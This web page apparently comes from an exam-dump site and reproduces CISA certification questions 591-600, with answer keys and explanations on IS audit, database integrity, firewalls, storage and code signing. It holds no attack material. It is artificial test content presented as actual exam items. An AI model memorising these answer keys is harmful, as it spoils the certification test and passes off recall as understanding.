Download New Updated (July) Isaca CISA Actual Test 591-600

Ensurepass

 

QUESTION 591

Which of the following would an IS auditor consider to be the MOST helpful when evaluating the effectiveness and adequacy of a computer preventive maintenance program?

 

A.

A system downtime log

B.

Vendors’ reliability figures

C.

Regularly scheduled maintenance log

D.

A written preventive maintenance schedule

 

Correct Answer: A

Explanation:

A system downtime log provides information regarding the effectiveness and adequacy of computer preventive maintenance programs.

 

 

QUESTION 592

Which of the following will prevent dangling tuples in a database?

 

A.

Cyclic integrity

B.

Domain integrity

C.

Relational integrity

D.

Referential integrity

 

Correct Answer: D

Explanation:

Referential integrity ensures that a foreign key in one table will equal null or the value of a primary in the other table. For every tuple in a table having a referenced/foreign key, there should be a corresponding tuple in another table, i.e., forexistence of all foreign keys in the original tables, if this condit
ion is not satisfied, then it results in a dangling tuple. Cyclical checking is the control technique for the regular checking of accumulated data on a file against authorized sourcedocumentation. There is no cyclical integrity testing. Domain integrity testing ensures that a data item has a legitimate value in the correct range or set. Relational integrity is performed at the record level and is ensured by calculating and verifying specific fields.

 

 

QUESTION 593

The PRIMARY objective of service-level management (SLM) is to:

 

A.

define, agree, record and manage the required levels of service.

B.

ensure that services are managed to deliver the highest achievable level of availability.

C.

keep the costs associated with any service at a minimum.

D.

monitor and report any legal noncompliance to business management.

 

Correct Answer: A

Explanation:

The objective of service-level management (SLM) is to negotiate, document and manage (i.e., provide and monitor) the services in the manner in which the customer requires those services. This does not necessarily ensure that services are delivered atthe highest achievable level of availability (e.g., redundancy and clustering). Although maximizing availability might be necessary for some critical services, it cannot be applied as a general rule of thumb. SLM cannot ensure that costs for all services will be kept at a low or minimum level, since costs associated with a service will directly reflect the customer’s requirements. Monitoring and reporting legal noncompliance is not a part of SLM.

 

QUESTION 594

When reviewing a hardware maintenance program, an IS auditor should assess whether:

 

A.

the schedule of all unplanned maintenance is maintained.

B.

it is in line with historical trends.

C.

it has been approved by the IS steering committee.

D.

the program is validated against vendor specifications.

 

Correct Answer: D

Explanation:

Though maintenance requirements vary based on complexity and performance work loads, a hardware maintenance schedule should be validated against the vendor-provided specifications. For business reasons, an organization may choose a more aggressive maintenance program than the vendor’s program. The maintenance program should include maintenance performance history, be it planned, unplanned, executed or exceptional. Unplanned maintenance cannot be scheduled. Hardware maintenance programs do not necessarily need to be in line with historical trends. Maintenance schedules normally are not approved by the steering committee.

 

 

QUESTION 595

Which of the following tests performed by an IS auditor would be the MOST effective in determining compliance with an organization’s change control procedures?

 

A.

Review software migration records and verify approvals.

B.

identify changes that have occurred and verify approvals.

C.

Review change control documentation and verify approvals.

D.

Ensure that only appropriate staff can migrate changes into production.

 

Correct Answer: B

Explanation:

The most effective method is to determine through code comparisons what changes have been made and then verify that they have been approved. Change control records and software migration records may not have all changes listed. Ensuring that only appropriate staff can migrate changes into production is a key control process, but in itself does not verify compliance.

 

 

QUESTION 596

Which of the following network components is PRIMARILY set up to serve as a security measure by preventing unauthorized traffic between different segments of the network?

 

A.

Firewalls

B.

Routers

C.

Layer 2 switches

D.

VLANs

 

Correct Answer: A

Explanation:

Firewall systems are the primary tool that enable an organization to prevent unauthorized access between networks. An organization may choose to deploy one or more systems that function as firewalls. Routers can filter packets based on parameters, such as source address, but are not primarily a security tool. Based on Media Access Control (MAC) addresses, layer 2 switches separate traffic in a port as different segments and without determining if it is authorized or unauthorized traffic. A virtual LAN (VLAN) is a functionality of some switches that allows them to switch the traffic between different ports as if they are in the same LAN. Nevertheless, they do not deal with authorized vs. unauthorized traffic.

 

 

QUESTION 597

Which of the following would be an indicator of the effectiveness of a computer security incident response team?

 

A.

Financial impact per security incident

B.

Number of security vulnerabilities that were patched

C.

Percentage of business applications that are being protected< /font>

D.

Number of successful penetration tests

 

Correct Answer: A

Explanation:

The most important indicator is the financial impact per security incident. Choices B, C and D could be measures of effectiveness of security, but would not be a measure of the effectiveness of a response team.

 

 

QUESTION 598

During the requirements definition phase for a database application, performance is listed as a top priority. To access the DBMS files, which of the following technologies should be recommended for optimal I/O performance?

 

A.

Storage area network (SAN)

B.

Network Attached Storage (NAS)

C.

Network file system (NFS v2)

D.

Common Internet File System (CIFS)

 

Correct Answer: A

Explanation:

In contrast to the other options, in a SAN comprised of computers, FC switches or routers and storage devices, there is no computer system hosting and exporting its mounted file system for remote access, aside from special file systems. Access to information stored on the storage devices in a SAN is comparable to direct attached storage, which means that each block of data on a disk can be addressed directly, since the volumes of the storage device are handled as though they are local, thus providing optimal performance. The other options describe technologies in which a computer (or appliance) shares its information with other systems. To access the information, the complete file has to be read.

 

 

QUESTION 599

An organization provides information to its supply chain partners and customers through an extranet infrastructure. Which of the following should be the GREATEST concern to an IS auditor reviewing the firewall security architecture?

 

A.

A Secure Sockets Layer (SSL) has been implemented for user authentication and remote administration of the firewall.

B.

Firewall policies are updated on the bas
is of changing requirements.

C.

inbound traffic is blocked unless the traffic type and connections have been specifically permitted.

D.

The firewall is placed on top of the commercial operating system with all installation options.

 

Correct Answer: D

Explanation:

The greatest concern when implementing firewalls on top of commercial operating systems is the potential presence of vulnerabilities that could undermine the security posture of the firewall platform itself. In most circumstances, when commercial firewalls are breached that breach is facilitated by vulnerabilities in the underlying operating system. Keeping all installation options available on the system further increases the risks of vulnerabilities and exploits. Using SSL for firewall administration (choice A) is important, because changes in user and supply chain partners’ roles and profiles will be dynamic. Therefore, it is appropriate to maintain the firewall policies daily (choice B), and prudent to block all inbound traffic unless permitted (choice C).

 

 

QUESTION 600

The purpose of code signing is to provide assurance that:

 

A.

the software has not been subsequently modified.

B.

the application can safely interface with another signed application.

C.

the signer of the application is trusted.

D.

the private key of the signer has not been compromised.

 

Correct Answer: A

Explanation:

Code signing can only ensure that the executable code has not been modified after being signed. The other choices are incorrect and actually represent potential and exploitable weaknesses of code signing.

Free VCE & PDF File for Isaca CISA Real Exam

Instant Access to Free VCE Files: CompTIA | VMware | SAP …
Instant Access to Free PDF Files: CompTIA | VMware | SAP …

This entry was posted in CISA Real Tests (July) and tagged , , , , , , . Bookmark the permalink.